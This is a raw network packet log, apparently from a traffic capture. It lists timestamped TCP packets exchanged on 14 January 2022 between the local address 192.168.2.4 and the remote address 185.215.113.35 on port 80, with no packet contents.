Jan 14, 2022 00:16:08.145605087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.145693064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.145780087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.145869017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.145952940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.146040916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.146132946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.146219015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.146318913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.146408081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.146496058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.146584034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.146682978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.146770000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.146922112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.147105932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.147228956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.147330999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.147416115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.147509098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.147593975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.147681952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.147768021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.147854090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.147944927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.148031950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.148119926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.148209095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.148332119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.148423910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.148510933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.148597956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.148684978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.148772955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.148864031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.148948908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.149038076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.149130106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.149215937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.149308920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.149416924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.149506092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.149590969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.149679899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.149770975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.149856091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.149945974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.150033951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.150122881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.150212049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.150345087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.150434971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.150541067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.150633097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.150732040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.150820971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.150917053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.151215076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.151366949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.151477098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.151571989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.151675940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.151771069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.151874065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.151968956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.152075052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.152168036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.152281046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.152365923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.152463913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.152559996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.152647972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.152745008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.152831078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.152926922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.153031111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.153139114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.153233051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.153389931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.153506994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.153599024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.153695107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.153791904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.153884888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.153981924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.154083014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.154177904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.154340982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.154453993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.154548883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.154653072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.154746056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.154850960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.154942036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.155045033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.155142069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.155328989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.157299042 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.158768892 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.158793926 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.158855915 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.159643888 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.162364006 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.166395903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.166548014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.166660070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.166764021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.166871071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.166963100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.167071104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.167165995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.167272091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.167366982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.167469025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.167565107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.167671919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.167771101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.167862892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.167968988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.168059111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.168168068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.168541908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.168637991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.168741941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.168833971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.168939114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.169030905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.169137955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.169234037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.169369936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.169466019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.169568062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.169672966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.169775009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.169872046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.169986963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.170073032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.170167923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.170270920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.170367956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.170469046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.170563936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.170665026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.170758009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.170862913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.170953989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.171056986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.171149969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.171256065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.171348095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.171473026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.171562910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.171681881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.171762943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.171864033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.171957970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.172065973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.172158003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.172280073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.172370911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.172475100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.172569990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.172672033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.172765017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.172877073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.172960997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.173063040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.173156023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.173260927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.173355103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.173456907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.173549891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.173654079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.176683903 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.176697016 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.176712990 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.176742077 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.176773071 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.176858902 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.176875114 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.176894903 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.176923990 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.176955938 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.176985025 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.177012920 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.177040100 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.177059889 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.177078962 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.177110910 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.177136898 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.177164078 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.184757948 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.188028097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.188139915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.188371897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.188503027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.188601017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.188694954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.188787937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.188888073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.188982010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.189099073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.189260960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.189349890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.189440966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.189532995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.189630985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.189721107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.189812899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.189905882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.190000057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.190090895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.190190077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.190315962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.190412045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.190500975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.190597057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.190687895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.190782070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.190874100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.190968037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.191061020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.191163063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.191257000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.191345930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.191430092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.191519022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.191603899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.195699930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.195806980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.195914984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.196013927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.196118116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.196213007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.196320057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.196414948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.196516037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.196611881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.196715117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.196811914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.196913958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.197012901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.197113037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.197206974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.197335005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.197438955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.197539091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.197633982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.197735071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.197832108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.197937965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.198033094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.198133945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.198227882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.198410034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.198513985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.198607922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.198702097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.198795080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.198889017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.198983908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.199090004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.199176073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.199345112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.199439049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.199532986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.199618101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.199707985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.199794054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.199882984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.199971914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.200059891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.200145960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.200241089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.200340033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.200429916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.200515985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.200606108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.200691938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.200783968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.201050043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.201222897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.201375008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.201466084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.201554060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.201642990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.201739073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.201838970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.201942921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.202054977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.202131987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.202230930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.202347040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.202435017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.202527046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.202739000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.202936888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.203048944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.203155041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.203254938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.203351974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.203443050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.203538895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.203630924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.203732967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.203820944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.203922987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.204025030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.204147100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.204272985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.204364061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.204456091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.204551935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.204643011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.204737902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.204828024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.204924107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.205018044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.205110073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.205203056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.205559969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.205655098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.205749989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.205837965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.205941916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.206037998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.206132889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.206228018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.206329107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.206422091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.206516981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.206645012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.206743956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.216532946 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.221182108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.221553087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.221654892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.221761942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.221854925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.221966982 CET	49902	80	192.168.2.4	185.215.113.35
